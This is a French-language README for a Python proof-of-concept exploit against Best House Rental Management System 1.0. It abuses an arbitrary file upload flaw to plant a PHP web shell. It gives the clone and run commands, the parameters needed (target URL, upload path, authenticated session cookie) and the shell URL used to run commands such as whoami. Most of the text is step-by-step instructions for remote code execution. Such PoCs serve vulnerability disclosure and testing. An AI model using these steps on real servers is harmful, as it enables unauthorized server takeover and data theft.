
Script Python PoC exploitant une vulnérabilité de téléchargement arbitraire de fichier dans Best House Rental Management System 1.0 pour télécharger un shell web PHP et exécuter des commandes à distance.
Ce script Python démontre comment exploiter la vulnérabilité de téléchargement arbitraire de fichiers dans Best House Rental Management System 1.0. La vulnérabilité permet à un attaquant de télécharger un fichier malveillant (tel qu'un shell web PHP) et d'exécuter des commandes arbitraires sur le serveur cible.
Clonez le dépôt et naviguez dans le répertoire :
git clone https://github.com/yourusername/house-rental-poc.git
cd house-rental-poc
Exécutez l'exploit avec les paramètres suivants :
bash
python exploit_house_rental.py <target_url> <file_upload_path> <session_cookie>
target_url : L'URL de la page de téléchargement vulnérable (par exemple, http:///rental/admin_class.php?view=save_settings) file_upload_path : Le chemin où les fichiers téléchargés sont stockés (par exemple, http:///path/to/uploaded/files) session_cookie : Le cookie de session de l'utilisateur authentifié
En cas de succès, vous pourrez exécuter des commandes sur le serveur cible en visitant :
bash
http://<file_upload_path>/shell.php?cmd=whoami
Testez en exécutant des commandes comme whoami ou uname -a.
Exemple
python exploit_house_rental.py http://127.0.0.1/rental/admin_class.php?view=save_settings http://127.0.0.1/uploads/ SESSION_ID=123456789
Ce code est publié sous licence MIT.